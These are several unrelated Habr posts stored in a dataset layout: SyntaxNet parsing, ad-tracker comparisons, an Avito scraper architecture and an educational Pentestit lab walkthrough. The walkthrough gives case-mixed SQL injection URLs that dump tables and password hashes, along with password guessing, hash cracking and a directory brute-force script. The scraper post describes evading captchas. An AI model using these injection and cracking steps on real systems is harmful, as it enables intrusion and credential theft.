while (true)
{
sum = baseSum + powers[ind0];
foundVal = findInRange( sum, lastRangeIndex);
if (foundVal > 0)
{
// нашли!
}
// следующий
++ind0;
if (ind0 < N)
{
continue;
}
else
{
ind0 = ++ind1;
}
if (ind1 >= N)
{
ind0 = ind1 = ++ind2;
}
if (ind2 >= N)
{
ind0 = ind1 = ind2 = ++ind3;
}
if (ind3 >= N)
{
break;
}
// сброс индекса на начальное значение при изменении старших индексов
lastRangeIndex = 0x02;
if (ind1 > lastRangeIndex)
{
lastRangeIndex = ind1;
}
if (ind2 > lastRangeIndex)
{
lastRangeIndex = ind2;
}
if (ind3 > lastRangeIndex)
{
lastRangeIndex = ind3;
}
// refresh without ind0
baseSum = powers[ind1] + powers[ind2] + powers[ind3];
}
Скорость на маленьких значениях N немного уступает самописному map, но как только растёт N — скорость работы даже начинает расти! Ведь промежутки между степенями больших N растут чем дальше, тем больше и линейный поиск работает всё меньше! Сложность получается лучше O(1).
Вот вам и потеря времени. А всё почему? Не надо бросаться грудью на амбразуру, посиди — подумай. Как оказалось, самый быстрый алгоритм — это линейный поиск и никакие map/bitset не нужны. Но, безусловно, это очень интересный опыт.
Хабр любит исходники и они есть у меня . В коммитах можете даже посмотреть историю «борьбы». Там лежат обе версии и C++, и C#, в котором этот трюк, конечно, так же отлично работает. Проекты хоть и вложены один в другой, но, конечно, никак не связаны.
Исходники ужасны, в начале находятся дефайны, где можно задать основное значение (uint64, uint128, boost::uin128/decimal(для C#), библиотеку можно переключать std/boost (boost::unordered_map оказался быстрее std::unordered_map примерно на 10%). Так же выбирается алгоритм поиска (правда сейчас вижу, что предварительный фильтр для unordered_map в версии C++ не пережил правок, но он есть в коммитах и в C# версии) unordered_map, самописный bitset и range (последний вариант).
Вот такая вот сказка и мне урок. А может и ещё кому будет интересно. Ведь много каких значений ещё не нашли …
* к/ф Сказка о потерянном времени, 1964г. | https://habrahabr.ru/post/317588/ |
habrahabr | Синтаксический анализ текстов с помощью SyntaxNet | ['nlp', 'syntaxnet', 'синтаксический анализ', 'php', 'tensorflow', 'maltparser'] | Для одной из задач мне понадобился синтаксический анализатор русскоязычных текстов. Что это такое. Например, у нас есть предложение «Мама мыла раму». Нам нужно получить связи слов в этом... | Для одной из задач мне понадобился синтаксический анализатор русскоязычных текстов. Что это такое. Например, у нас есть предложение «Мама мыла раму». Нам нужно получить связи слов в этом предложении в виде дерева:
Из этого дерева понятно, что связаны слова «мама» и «мыла», а также «мыла» и «раму», а слова «мама» и «раму» напрямую не связаны.
Статья будет полезна тем, кому понадобился синтаксический анализатор, но не понятно, с чего начать.
Я занимался этой темой несколько месяцев назад, и на тот момент нашел не много информации по поводу того, где бы взять готовый и желательно свободный анализатор.
На Хабре есть отличная статья об опыте работы с MaltParser. Но с тех пор некоторые пакеты, используемые для сборки, переехали в другие репозитории и чтобы собрать проект с нужными версиями библиотек, придется хорошенько потрудиться.
Есть и другие варианты, среди которых SyntaxNet. На Хабре я не нашел ничего про SyntaxNet, поэтому восполняю пробел. Что такое SyntaxNet
По сути SyntaxNet — это основанная на TensorFlow библиотека определения синтаксических связей, использует нейронную сеть. В настоящий момент поддерживается 40 языков , в том числе и Русский. Установка SyntaxNet
Весь процесс установки описан в официальной документации. Дублировать инструкцию здесь смысла не вижу, отмечу лишь один момент. Для сборки используется Bazel. Я попробовал собрать проект с его помощью у себя на виртуалке с Ubuntu 16.04 x64 Server с выделенными 4-мя процессорами и 8 ГБ оперативной памяти и это не увенчалось успехом — вся память съедается и задействуется своп. После нескольких часов я прервал процесс установки, и повторил всё, выделив уже 12 ГБ оперативной памяти. В этом случае все прошло гладко, в пике задействовался своп только на 20 МБ.
Возможно есть какие-то настройки, с помощью которых можно поставить систему в окружении с меньшим объемом оперативной памяти. Возможно сборка выполняется в нескольких параллельных процессах и стоило выделять виртуальной машине только 1 процессор. Если вы знаете, напишите в комментариях.
После завершения установки я оставил для этой виртуальной машины 1ГБ памяти и этого хватает с запасом для того, чтобы успешно парсить тексты.
В качестве размеченного корпуса я выбрал Russian-SynTagRus, он более объемный по сравнению с Russian и с ним точность должна получаться выше. Использование SyntaxNet
Чтобы распарсить предложение, переходим в каталог tensorflow/models/syntaxnet и запускаем (путь к модели — абсолютный): echo "Мама мыла раму" | syntaxnet/models/parsey_universal/parse.sh /home/tensor/tensorflow/Russian-SynTagRus > result.txt
В файле result.txt получаем примерно такой вывод, я заменил данные в 6-й колонке на "_", чтобы тут не переносились строки, иначе неудобно читать: cat result.txt
1 Мама _ NOUN _ _ 2 nsubj __
2 мыла _ VERB _ _ 0 ROOT _ _
3 раму _ NOUN _ _ 2 dobj __
Данные представлены в формате CoNLL-U . Тут наибольший интерес представляют следующие колонки:
1. порядковый номер слова в предложении,
2. слово (или символ пунктуации),
4. часть речи, тут можно посмотреть описание частей речи,
7. номер родительского слова (или 0 для корня).
То есть мы имеем дерево, в которм слово «мыла» — корень, потому что оно находится в той строке, где колонка номер 7 содержит «0». У слова «мыла» порядковый номер 2. Ищем все строки, в которых колонка номер 7 содержит «2», это дочерние элементы к слову «мыла». Итого, получаем:
Кстати, если разобраться подробнее, то дерево не всегда удачно представляется все зависимости. В ABBYY Compreno , например, в дерево добавляют дополнительные связи , которые указывают на связь элементов, находящихся в разных ветках дерева. В нашем случае таких связей мы не получим. Интерфейс
Если вам критична скорость парсинга текстов, то можно попробовать разобраться с TensorFlow Serving , с помощью него можно загружать модель в память один раз и далее получать ответы существенно быстрее. К сожалению, наладить работу через TensorFlow Serving оказалось не так просто, как казалось изначально. Но в целом это возможно. Вот пример , как это удалось сделать для корейского языка. Если у вас есть пример как это сделать для русского языка, напишите в комментариях.
В моем случае скорость парсинга не была сильно критичной, поэтому я не стал добивать тему с TensorFlow Serving и написал простое API для работы с SyntaxNet , чтобы можно было держать SyntaxNet на отдельном сервере и обращаться к нему по HTTP.
В этом репозитории есть и веб интерфейс, который удобно использовать для отладки, чтобы посмотреть как именно распарсилось предложение.
Чтобы получить результат в JSON, делаем такой запрос: curl -d text="Мама мыла раму." -d format="JSON" http://<host where syntax-tree installed>
Получаем такой ответ: [{
number: "2",
text: "мыла",
pos: "VERB",
children: [
{
number: "1",
text: "мама",
pos: "NOUN",
children: [ ]
},
{
number: "3",
text: "раму",
pos: "NOUN",
children: [ ]
}
]
}]
Уточню один момент. Bazel интересным образом устанавливает пакеты, так, что часть бинарников хранится в ~/.cache/bazel . Чтобы получить доступ к их исполнению из PHP, я на локальной машине добавил права на этот каталог для пользователя веб сервера. Наверное той же цели можно добиться более культурным путем, но для экспериментов этого достаточно. Что еще
Еще есть MaltParser, о котором я упомянул вначале. Позже я обнаружил, что тут можно скачать размеченный корпус SynTagRus и даже успешно обучил на нем свежую версию MaltParser, но не нашел пока времени довести дело до конца и собрать MaltParser целиком, чтобы получать результат парсинга. Эта система немного иначе строит дерево и мне для своей задачи интересно сравнить результаты, получаемые с помощью SyntaxNet и MaltParser. Возможно в следующий раз удастся написать об этом.
Если вы уже успешно пользуетесь каким-либо инструментом для синтаксического анализа текстов на русском языке, напишите в комментариях, чем вы пользуетесь, мне и другим читателям будет интересно узнать. UPD
Весьма полезные уточнения от buriy в комментарии ниже: синтаксический анализ там намного лучше работал бы, если бы не было ошибок в модели морфологии, которая не основана на словарях, а тоже является нейросетью Во входном формате знаки пунктуации — отдельные токены.
Поэтому предложения на вход надо подавать таком виде, чтобы знаки препинания были с двух сторон отделены пробелами. Ну и ещё точка в конце предложения иногда что-то меняет Перед финальной точкой тоже должен стоять пробел, так устроен входной формат и на таких примерах модель обучалась | https://habrahabr.ru/post/317564/ |
habrahabr | Сравнение трекинговых систем Affise, HasOffers и FuseClick | ['hasoffers', 'fuseclick', 'affise', 'mobio', 'tracking systems'] | На рынке мобильного маркетинга представлено немало трекинговых систем. И если, говоря о клиенте, мы сразу думаем о таких гигантах, как AppsFlyer, Adjust, MAT и т.д, то говоря о трекерах для... | На рынке мобильного маркетинга представлено немало трекинговых систем. И если, говоря о клиенте, мы сразу думаем о таких гигантах, как AppsFlyer, Adjust, MAT и т.д, то говоря о трекерах для рекламных агентств, мы подразумеваем немного другие системы: HasOffers, FuseСlick, Affise, Cake и пр.
В Mobio мы проработали с тремя из упомянутых выше систем: HasOffers, FuseClick и Affise. На определенном этапе развития компании каждая из них нам пригодилась. Однако всегда присутствовали вещи, которые было бы неплохо переработать. В статье пойдет речь о плюсах и минусах этих систем.
Перед тем, как начать оценку по критериям, расскажу немного о каждой из систем: HasOffers. Один из титанов на рынке, про него знают практически все. Добротная и проверенная временем система, интеграцию с которой сторонние сервисы проводят в первую очередь. FuseClick. Разработка из Китая, в которой получилось сделать некоторые вещи еще лучше. Но есть и ряд серьезных недостатков, о которых пойдет речь в дальнейшем. Affise. Литовская система с российскими корнями, созданная с учетом особенностей мобильных агентств, потому как изначально была разработана ее представителями. Из рассматриваемых — самая молодая и активно развивающаяся.
Далее рассмотрим критерии для оценки: стоимость системы;
скорость работы;
удобство статистики;
удобство настройки;
работа по API.
Стоимость
Для оценки возьмем уровень трафика 20 000 000 кликов, CR 1,5% — 300 000 конверсий.
В HasOffers стоимость наиболее подходящего тарифа — Enterprise — составит 799$. В нее включены 1 000 000 кликов, 10 000 000 импрессий и 500 000 конверсий. В случае превышения количества кликов, они идут по цене $0.80 / 1,000 кликов, импрессии — $0.005 / 1,000. Итоговая стоимость составит 15 999$.
В FuseClick стоимость идет строго за клики. За 20 000 000 она составит 4 300$. Affise считает стоимость исключительно по количеству конверсий. Подходящий план, Enterprise, включает в себя 60 000 конверсий за 499$. Превышение — $0,008 за конверсию. Итого для 300 000 стоимость составит 2 419$.
Конечно, критерий довольно гибкий. Вы можете лить трафик с разным CR, в разных объемах, использовать VIP-тарифы, однако, по тем данным, что я использовал, оценка такова: Скорость работы
Здесь мы учитываем общую скорость загрузки страниц при обновлении или переходе.
HasOffers весьма быстр и оперативен в работе, нареканий никогда не вызывал, не “падал”. Жалоб нет, высший балл.
С FuseClick диаметрально противоположная ситуация. Скорость это не про FuseClick, загрузки страниц с оффером по минуте реального времени — обыденная ситуация. Собственно, одна из причин отказа от работы с этой системой.
Affise не столь быстр как HasOffers, но и не слишком отстает. Да, иногда бывают задержки с загрузкой, однако в общем и целом держится весьма бодро. К тому же, по словам тех.поддержки, вскоре будет перенос на новую архитектуру, что повысит скорость работы. Ну а пока — четверка с минусом. Удобство статистики
Здесь смотрим на создание различных отчетов, насколько точно и своевременно все происходит.
HasOffers — статистика очень подробная, пользоваться удобно, разобраться очень легко. Все необходимые функции имеются. Единственный минус — нельзя отсечь сразу все события, отличные от установок.
FuseClick — тут можно то, что нельзя в HasOffers — реализована специальная галочка “Все события” или только “Начальные события”. Однако минус в том, что агрегация порой дает жесткие сбои, поэтому можно доверять только отчету по конверсиям и Overall-report, благо из них можно извлечь все что нужно.
Affise — статистика пока находится в процессе доработки, на данный момент функции весьма сырые. Да, получить можно все, что требуется, однако приходится идти к этому заковыристыми путями. Удобство настройки
Как быстро получится завести оффер и настроить его?
HasOffers — сам оффер завести довольно быстро. Однако начинаются проблемы, когда нужно, чтобы он работал в MyTarget или необходимо настроить события и раздельные выплаты. Нужно для первой задачи сделать тех. оффер, связать его с HasOffers через отдельную сущность Offer-Group, затем по второму вопросу настроить события и попросить клиента передавать их именно с тем айди, какой присвоил HasOffers (очень неудобная вещь), а для разных выплат нужно заводить кучу отдельных групп и заново прописывать их в оффере.
FuseClick — тех. оффер заводить все так же надо, но на него хотя бы легче направить нецелевой трафик с основного оффера — нет необходимости заводить группу. Однако сама настройка оффера занимает гораздо дольше времени. Впрочем, это можно отнести к критерию быстродействия. Цели завести довольно просто, как и прописать им кастомное значение, что экономит время. Однако с разными выплатами придется заводить много разных офферов — мультивыплаты по одному офферу система не поддерживает в принципе.
Affise — здесь система проявляет себя во всей красе. Тех. оффер в принципе не нужен — весь нецелевой траф можно направить на preview-link, что решает вопросы с МТ. Все выплаты и цели настраиваются в одном окошке, позволяя в единственном оффере настроить все возможные варианты сочетания ГЕО и целей. Работа по API
Разнообразие методов и настроек, стабильность работы с API.
HasOffers — в мануале есть подробная информация по всем методам, возможность запустить их сразу из инструкции, примеры использования и т.д. По стабильности работы вопросов нет, все отлично.
FuseClick — методы расписаны довольно подробно, но сразу запустить тест не получится, больше похоже на стандартный pdf-мануал. По стабильности был замечен странный баг. В отчете по конверсиям интерфейс давал корректные цифры, однако API-метод в ответе присылал разные данные в зависимости от времени запуска. После обращения в поддержку починили в течение дня, однако “осадочек остался”.
Affise — проблем со стабильностью методов не возникает, документация весьма подробная, и есть тестовый запуск общих методов (не требующих авторизации). В целом, весьма неплохо. Учитывая, что API ввели не так давно — очень хорошо. Неплохо было бы увидеть в дальнейшем больше методов, однако и сейчас все готово к работе.
________________________________________________________________________________ Итоговые результаты
На первом месте Affise. Разумная стоимость, удобство работы, не слишком бросающиеся в глаза недостатки. Компания не пожалела о переходе, и сейчас мы довольны работой данной системы.
В спину Affise дышит HasOffers. Что и говорить, система всем давно привычная и занявшая прочное место на рынке. Однако в этом и проблема — некоторые вещи пора было бы и улучшить, но никто не станет этого делать.
Завершает гонку FuseClick. Система сырая, медленная, хотя и не лишенная своих достоинств. Возможно, кому-то она вполне подойдет, но лично я бы не советовал ей пользоваться.
Конечно, есть моменты, которые для кого-то сделают лидером ту или иную систему — что ж, вам судить, не мне. Но из того, что требуется в работе нам в Mobio , Affise является самым оптимальным вариантом. Если вы не согласны с оценками и хотите их дополнить своими замечаниями и комментариями — будем рады подискутировать. | https://habrahabr.ru/company/mobio/blog/317496/ |
habrahabr | Add-on к Авито. Стартап или пример архитектуры | ['mysql', 'golang', 'java', 'android'] |
Предыстория
Честно говоря, никогда ранее не покупал б/у вещи на досках объявлений. Но когда случился очередной экономический кризис и нужда заставила, пришлось обратить свое внимание на... | Предыстория
Честно говоря, никогда ранее не покупал б/у вещи на досках объявлений. Но когда случился очередной экономический кризис и нужда заставила, пришлось обратить свое внимание на Авито.
При осмотре предложений сразу бросилось в глаза, что часть объявлений выглядит сомнительными по ряду признаков: заниженная цена, неточное описание и т.п., по которым складывалось впечатление, что или продают не то, что предлагают, или сами не знают что продают. В памяти сразу возник образ из прошлого — барахолки 90-х годов, с которых можно было вернуться как с покупками, так и с пустыми карманами или порезанной сумкой.
Как известно, Авито не дает информацию о других объявлениях продавца, поэтому в тексте объявления часто используют ключевые слова или хэштеги, которые покупатель может использовать для поиска. Но надо заметить, что администрация Авито не приветствует наличие в тексте объявления любой информации, не относящейся к предмету продажи, о чем говорится в правилах размещения. При нарушении правил размещения Авито может заблокировать как объявление, так и аккаунт продавца.
Поисковик выдал мне несколько сайтов, паразитирующих на Авито и других досках объявлений, преимущественно связанных с подержанными автомобилями. В большинстве своем они предлагают поиск объявлений по номеру телефона продавца в базе предварительно скачанных объявлений. Все они имеют недостатки, немаловажные для меня: замысловатый интерфейс, платность услуги, обновление данных с определенным лагом.
Разделяя мнение Стивена Леви о свободном доступе к информации, было решено проанализировать Авито на предмет разработки собственного сервиса sravnito.ru с блэкджеком и всеми делами, а именно: с простым интерфейсом и бесплатным доступом.
На основании проведенного анализа были определены основные атрибуты объявления: название
дата публикации
цена
местонахождение
телефонный номер (либо изображение номера, либо хэш от него, либо распознанное OCR значение)
Архитектура
Теперь непосредственно об архитектуре программного комплекса, на котором основан сервис поиска всех объявлений продавца: Хранилище
В качестве хранилища для хранения объявлений и их скриншотов используется MySQL (Maria DB) с движком InnoDB.
В DB1 хранятся объявления с основными атрибутами. Для сокращения объема памяти, занимаемого данными, для текстовых полей используется тип VARCHAR, так как их длина разнится от объявления к объявлению. Ежедневно добавляется примерно полмиллиона строк, среди которых как сами объявления, так и логи и служебная информация. При такой динамике хранилище по праву можно будет относить к Big Data. Из особенностей настройки можно выделить следующие параметры: max_heap_table_size = 512M
innodb_buffer_pool_size = 3G
Таблицы в куче используются для оптимизации запросов из нескольких больших таблиц, когда сначала данные выбираются во временную таблицу: CREATE TEMPORARY TABLE _temp_table ENGINE=MEMORY AS (
SELECT field
FROM table
WHERE key = i_key
LIMIT i_limit);
которая потом соединяется с другой: SELECT table.*
FROM table
JOIN _temp_table
ON table.field = _temp_table.field;
В DB2 хранятся скриншоты объявлений как они выглядят для пользователя браузера. Перед записью скриншоты сжимаются в JPEG с quality = 5, что обеспечивает размер файла с изображением равный примерно 20Кб. Принято считать, что при размере BLOB не более 200Кб, производительность хранения файлов в MySQL ничем не уступает NoSQL-хранилищам, что позволяет оставаться в зоне комфорта реляционной СУБД со всеми ее преимуществами. Настолько сжатый скриншот, несмотря на минимальное качество изображения, позволяет пользователю убедиться, что заданное объявление действительно существовало, и разглядеть хотя бы схематично изображение товара.
Вся логика реализована в хранимых процедурах, чтобы инкапсулировать зависимый от структуры данных код в самой СУБД. Таким образом, клиенты СУБД имеют полномочия только для доступа к хранимым процедурам, которые являются идемпотентными. Как дополнительный плюс получаем отсутствие возможности осуществления SQL-инъекций. API к хранилищу
Сервер M1 реализован как микросервис на golang и предоставляет RESTful API для сохранения объявлений, скриншотов, а также для чтения данных выводимых на странице сервиса поиска объявлений. Нет причин использовать какие-либо фреймворки или внешние библиотеки для реализации RESTful на golang, поэтому используются только стандартные библиотеки, кроме одной: import (
"database/sql"
"encoding/json"
"net/http"
_ "github.com/go-sql-driver/mysql"
)
Обрабатываются GET и POST запросы от клиентов и вызываются соответствующие хранимые процедуры БД DB1, DB2. Загрузчики объявлений
Объявления загружаются с сайта Авито загрузчиками S(1)-S(N), написанными на Java с использованием библиотеки Selenium WebDriver. Получив с Авито атрибуты объявления и скриншот, загрузчик обращается к серверу M1 для передачи данных. Также реализована обратная связь для управления загрузчиками, которые периодически опрашивают сервер M1 на предмет команд, например «стоп», «старт». Captcha
Для разгадывания капчи, которую иногда запрашивает Авито, существует сервер C1, по аналогии с сервером M1 реализованный на golang и предоставляющий RESTful API. Разгадывание капчи осуществляется двумя способами: с помощью сервиса rucaptcha.com
вручную в приложении для Android
Для связи с rucaptcha.com используется их API. Для ручного разгадывания используется написанное на Java приложение Android, которое выводит изображение и принимает ответ. Сервер C1 принимает решение о перенаправлении капчи на rucaptcha.com или в приложение Android в зависимости от количества запросов, накопившихся в очереди. Получив разгадку капчи, сервер C1 отправляет ответ запросившему его загрузчику. Мониторинг
По аналогии с приложением Android для разгадывания капчи, существует приложение для мониторинга. Приложение Android для мониторинга обращается к серверу M1, который в свою очередь обращается к БД где агрегируются логи, на основе которых можно судить о количестве загруженных объявлений, сбоях в работе и т.п. Заключение
Дальнейшее развитие сервиса может быть таким: Создание загрузчиков для других досок объявлений, что позволит делать кросс-поиск всех объявлений одного продавца
Использование комплекса для обработки других данных, например загрузка из соцсетей для поиска всех постов по имени аккаунта
И в том и в другом случае разработке подлежат только загрузчики, которые легко интегрируются с серверами M1 и C1. Доработка других частей системы не потребуется.
Если сделать API серверов M1, C1 публичным с авторизацией и добавить в структуру БД ключевое поле для разделения по клиентам, то можно предоставлять услугу по хранению данных и обработке капчи как SaaS. Данные клиента можно хранить в BLOB в виде JSON, доработав при этом БД с хранимыми процедурами и интерфейс API.
Что можно сказать о выбранных технологиях: MySQL — классика жанра, без комментариев
Java — загрузчики можно запускать на кофеварках и холодильниках
golang — очень быстро разрабатываются микросервисы, легко деплоится путем копирования единственного бинарника на сервер
Буду признателен за комментарии и обсуждение. | https://habrahabr.ru/post/317598/ |
habrahabr | Пентест в Global Data Security — прохождение 10-й лаборатории Pentestit | ['пентест', 'pentestit', 'pentestit test lab', 'лаборатория'] |
Лаборатории компании Pentestit уже стали традицией для многих. Каждый май и ноябрь открывается очередная лаборатория, и тысячи энтузиастов по всему миру не спят сутками чтобы первыми... |
Лаборатории компании Pentestit уже стали традицией для многих. Каждый май и ноябрь открывается очередная лаборатория, и тысячи энтузиастов по всему миру не спят сутками чтобы первыми скомпрометировать сеть нового виртуального банка, разработчиков ПО или провайдера услуг в области ИБ.
25-го ноября запустилась очередная, на этот раз 10-я лаборатория , где участникам было предложено прорваться в сеть вымышленной компании Global Data Security — разработчика ПО в области информационной безопасности.
6-го декабря, ровно через 11 суток, лаборатория была пройдена первыми участниками, которые смогли получить доступ к каждому уязвимому узлу сети компании Global Data Security и нашли на них специальные токены — комбинации букв и цифр, которые нужно ввести в панель управления на сайте Pentestit.
Для тех, кто еще не успел заняться лабораторией — она будет активна до мая 2017-го года, после чего ее заменит уже объявленная 11-я лаборатория. А пока, эта статья предлагает описание всех этапов прохождения текущей лаборатории для всех, кто хочет развить свои навыки пентеста и узнать больше об актуальных уязвимостях на конец 2016-го года. Статья получилась длинная, но, надеюсь, интересная. Disclaimer Я не являюсь сотрудником или аффилированным лицом компании Pentestit. Этот документ описывает шаги, которые я предпринял, чтобы решить задания в лаборатории. Мои личные рекомендации и предпочтения никаким образом не относятся к официальному мнению компании Pentestit.
Вся информация в этом документе предоставлена исключительно в образовательных целях. Продолжая читать этот документ, вы соглашаетесь не использовать эту информацию в незаконных целях, и подтверждаете, что вы и только вы несете полную ответственность за свои действия или знания, полученные из этого документа. Автор этого документа и компания Pentestit не несут никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате прочтения данного документа. Подключение к лаборатории
Прежде чем начать, нужно зарегистрироваться в лаборатории, настроить VPN-соединение и подключиться к сети виртуальной компании Global Data Security.
Зарегистрируйтесь здесь , и затем следуйте этим инструкциям для того, чтобы подключиться.
Для проведения тестирования можно установить в виртуальной машине Kali Linux — специальный дистрибутив Линукса для пентестеров, в котором есть все необходимое для работы. Если вы этого еще не сделали, теперь самое время. Начинаем тестирование
После регистрации и подключения мы видим следующую схему сети:
Перед нами gateway с IP-адресом 192.168.101.9 — внешний шлюз компании. Любой пентест полезно начинать с пассивного и активного сбора информации о компании, ее сотрудниках, продуктах, сервисах, публичных сайтах и поддоменах и многом другом. Пассивный сбор информации означает, что мы не связываемся напрямую с серверами компании, а пробуем найти информацию в общедоступных источниках — Google, LinkedIn, data.com, GitHub, и прочих. Довольно часто можно найти много интересного: имена сотрудников подскажут логины во внутреннюю сеть, на GitHub иногда можно найти исходные тексты, которые помогут лучше узнать о внутреннем устройстве продуктов или инфраструктуры компании, и так далее.
К сожалению, в данном случае пассивный сбор информации не дал желаемых результатов (а вот в прошлой лаборатории , в задании SSH это было очень полезно), поэтому мы переходим к активному сбору информации, то есть такому, который подразумевает прямое взаимодействие с доступными нам ресурсами компании. Собираем информацию
Начнем мы со сканирования портов, доступных через шлюз:
Полезно также просканировать остальные TCP порты, и UDP порты: о них часто забывают, а ведь множество сервисов, такие как внутренний VPN (например, как в лаборатории #8 ) и другие. Оставим это в качестве упражнения, а сами пока сконцентрируемся на уже найденной информации.
В результате нам доступны SSH сервер, почтовый SMTP сервер, два сайта и веб-интерфейс для сотрудников в виде CommuniGate Pro на порту 8100. Начнем с изучения сайтов.
При попытке зайти на 192.168.101.9 получаем редирект на домен store.gds.lab. Видимо, сайт доступен по этому виртуальному хосту, и автоматически редиректит нас на него. Добавим нужную строку в /etc/hosts:
На всякий случай мы добавили gds.lab в том числе. Теперь сайт доступен:
Видим, что перед нами магазин на базе OpenCart:
При этом различные попытки его атаковать (например найти XSS или использовать одну из найденных в OpenCart уязвимостей ) приводят к такой странице:
Видимо, сайт защищен с помощью Web Application Firewall. Итого, после небольшой разведки, нам стала известна следующая информация: Магазин (видимо, токен store) основан на OpenCart и доступен по виртуальному хосту store.gds.lab
На основании сайта пока не удалось точно определить версию OpenCart
Любая грубая атака блокируется с помощью WAF (инъекции, XSS, перебор директорий)
Доступна папка /admin, но простые пароли по умолчанию не подходят
Попробуем зайти на 80-й порт используя виртуальный хост gds.lab:
Интересно, что здесь доступен еще один ресурс — файловый хостинг ownCloud. Изучив исходный код страницы и сообщение, понимаем, что правильная виртуальный хост — cloud.gds.lab. Внеся соответствующие изменения в hosts файл, получаем возможность пробовать логин и пароль:
Отлично! Попробовав несколько комбинаций вручную, видим, что стандартные пароли не подходят. При этом обнаруживаем в ownCloud интересную особенность: он предлагает сбросить пароль, если пароль неверный, и в зависимости от того, присутствует нужная учетная запись или нет, выдает разные сообщения:
Если учетной записи нет:
Если учетная запись зарегистрирована:
Пароль подобрать не удается, поэтому запомним найденное имя пользователя, и продолжим собирать информацию, на этот раз перейдя на следующий порт — 443. 192.168.101.9 , к сожалению, не доступен по https, с сообщением вида: An error occurred during a connection to 192.168.101.9. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG
Видимо, что-то с SSL. Сайт плохо сконфигурирован, и доступен по HTTP:
Видимо, это и есть основной сайт компании. Попробуем получить наш первый токен! Изучаем site
После внимательного изучения страниц сайта, определяем что он, видимо, написан разработчиками компании GDS, и не использует готовую CMS вроде WordPress.
С учетом того, что множество уязвимостей связаны с пользовательским вводом, посмотрим доступные нам entry points. Находим адрес: http://192.168.101.9:443/post.php?id=1
Если добавить одну кавычку в конце, получаем редирект на основную страницу сайта, а если две — нет. Похоже на SQL injection. Немного поэкспериментировав, находим, что условие находится в скобках: http://192.168.101.9:443/post.php?id=1') -- -
При этом попытки добавлять UNION SELECT не приводят к успеху, видимо, в сайте есть фильтр на SQL-инъекции. Попробуем его обойти, используя стандартный прием с изменением регистра: http://192.168.101.9:443/post.php?id=-1') UNiOn SeLect 1, @@veRsiOn -- -
Достанем таблицы: http://192.168.101.9:443/post.php?id=-1') UNiOn seLeCT 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database() -- -
Затем поля: http://192.168.101.9:443/post.php?id=-1') UNiOn seLeCT 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users' -- -
И затем логин и хеш пароля: http://192.168.101.9:443/post.php?id=-1') UNiOn alL (seLeCT usErNAme, pAssWoRd FroM users liMIT 0,1) -- -
Используем hashcat (желательно вне виртуальной машины, чтобы использовать GPU) чтобы восстановить пароль (и словари SecLists — очень рекомендую):
Получилось! Используя dirsearch находим административный интерфейс в папке /admin:
Вводим туда найденные имя пользователя и пароль, и получаем первый токен:
Такого же результата поможет добиться SQLMap с включенной опцией --tamper=randomcase, но последний запрос в любом случае придется сделать вручную. Берем mail
Во время изучения сайта, обращаем внимание на всю информацию, найденную в процессе исследования. Очень важно не останавливаться в сборе информации и продолжать записывать все найденные особенности.
В частности, на странице Contact Us есть информация о двух учетных записях:
А на основной странице есть ссылка на еще одного человека:
В результате получаем три учетные записи для почтового сервера: a.modlin
s.locklear
j.wise
e.lindsey (подходит пароль с сайта, но в почте ничего нет)
Проверим, не использует ли кто-то из этих пользователей словарный пароль:
Получилось подобрать пароль к пользователю a.modlin. Воспользуемся веб-интерфейсом почты на порту 8100:
Вот и следующий токен, а заодно и письмо от Joshua Wise с Android-приложением и следующим содержимым: .
Запомним это на будущее, судя по IP адресу и схеме сети, это приложение пригодится нам для токена ssh-test .
На данный момент мы внимательно изучили сайт (порт 443) и использовали его для получения двух токенов, кроме того, удалось обнаружить два виртуальных хоста (store.gds.lab и cloud.gds.lab) на 80-м порту. Последние защищены WAF-ом, поэтому несмотря на обилие возможных вариантов, найти уязвимости не получилось из-за постоянных блокировок.
Попробуем пробраться во внутреннюю сеть и продолжить оттуда. Сервер ssh
Пользователи часто используют одни и те же пароли на разных сервисах. Попробуем зайти на сервер SSH с под e.lindsey, с паролем найденным на сайте:
Получилось! На хосте удобно присутствует nmap, и нам доступна вся внутренняя сеть. Поискав токен, понимаем, что не все так просто.
На сервере есть много интересного. Среди прочего, находим: много новых учетных записей по /etc/passwd и содержимому /home,
исходный код магазина в /var/www/, из которого определяем версию OpenCart, пароль к локальной MySQL и хеш пароля администратора OpenCart
папку /data/users с правами на вход, но без прав на листинг.
Очень полезная инструкция по пост-эксплуатации Linux-машин доступна здесь . В данном случае повышение привилегий на сервере SSH не подразумевалось авторами лаборатории, но в любом случае изучить содержимое на предмет дополнительных скриптов, настроек конфигурации, вебсайтов, задач в планировщике, подключенных файловых систем и другого очень полезно.
С учетом того, что в конфигурации сайта токена нет, сконцентрируемся на папке /data/users.
Как видим, на ней отсутствует бит r, но присутствует бит x, а значит заходить и работать с содержимым папки можно, а вот смотреть ее листинг — нельзя. Когда мы сталкиваемся с такой же задачей в вебе (где практически всегда отключен листинг директорий), мы используем утилиты вроде dirb или dirsearch, которые пробуют открыть файлы по словарю, перебирая множество комбинаций. Попробуем сделать то же самое и здесь, словари можно использовать из dirb.
Напишем небольшой скрипт, чтобы рекурсивно перепробовать нужные нам поддиректории и файлы по словарю: """Importing os to access file system"""
import os
PATH = "/data/users/"
DICC = "/var/tmp/common.txt"
def attempt_path(path):
"""Check if file or directory exists and print out the result. Return true if directory"""
if os.path.isfile(path):
print "Found file : " + path
return False
if os.path.isdir(path):
print "Found dir : " + path
return True
return False
def look_for_subdirs(path):
"""Recursive function to look for dirs"""
with open(DICC) as dicc:
for line in dicc:
curr_path = path + line.rstrip('\n')
if attempt_path(curr_path):
look_for_subdirs(curr_path + "/")
look_for_subdirs(PATH)
print "Finished"
Теперь нужно подготовить словарь и загрузить его на ssh сервер. Один из способов — выложить словарь и наш код на питоне на локальный веб-сервер, и затем загрузить их с него с помощью wget.
Возьмем словарь из dirb, который в kali находится по адресу /usr/share/dirb/wordlists/common.txt , и добавим в него имена локальных пользователей, а заодно и файл token.txt (надеемся он где-то там):
К сожалению, наш IP напрямую недоступен с хоста 172.16.0.8, поэтому используем SSH туннель:
Здесь есть два момента, на которые нужно обратить внимание.
